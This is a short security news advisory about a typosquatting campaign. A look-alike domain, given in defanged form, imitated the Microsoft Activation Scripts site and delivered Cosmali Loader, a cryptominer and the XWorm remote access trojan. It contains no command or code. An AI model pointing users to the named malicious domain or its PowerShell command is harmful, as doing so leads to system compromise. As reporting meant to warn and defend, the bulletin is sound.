549/68 Friday, December 26, 2025
A cyberattack campaign has been detected using typosquatting, in which attackers deliberately register look-alike domains with misspellings to deceive users of Microsoft Activation Scripts (MAS)—an open-source PowerShell script commonly used to activate Windows and Office. In this campaign, attackers registered the domain get.activate[.]win (missing the letter “d”) to impersonate the legitimate domain get.activated[.]win. If users fail to notice the typo and enter the incorrect command in PowerShell, their systems are immediately infected with malware known as Cosmali Loader.
Analysis shows that Cosmali Loader is capable of installing cryptocurrency mining software and deploying the XWorm Remote Access Trojan (RAT), allowing attackers to remotely take control of infected machines.
This activity was uncovered after multiple users reported receiving a pop-up warning stating: “You are infected with Cosmali Loader malware because you mistyped the domain name,” along with urgent instructions to reinstall Windows. Security experts believe this warning did not originate from the malware authors themselves, but rather from security researchers or well-intentioned third parties who gained access to the malware’s poorly secured command-and-control panel. They likely used this access to notify victims that their systems were compromised and that their data might already be exposed publicly.
The official MAS project maintainers have since confirmed the incident and issued a strong warning to users, urging them to carefully verify command spelling before pressing Enter. They recommend downloading the scripts directly from the project’s official GitHub repository to minimize risk. Experts further advise that anyone who may have executed commands from the fake domain should inspect Task Manager for suspicious PowerShell processes. However, the most reliable remediation is a full system wipe and Windows reinstallation to completely remove the malware.
Users are reminded that relying on unofficial system activation or modification tools always carries inherent security risks, and extreme caution should be exercised at all times.
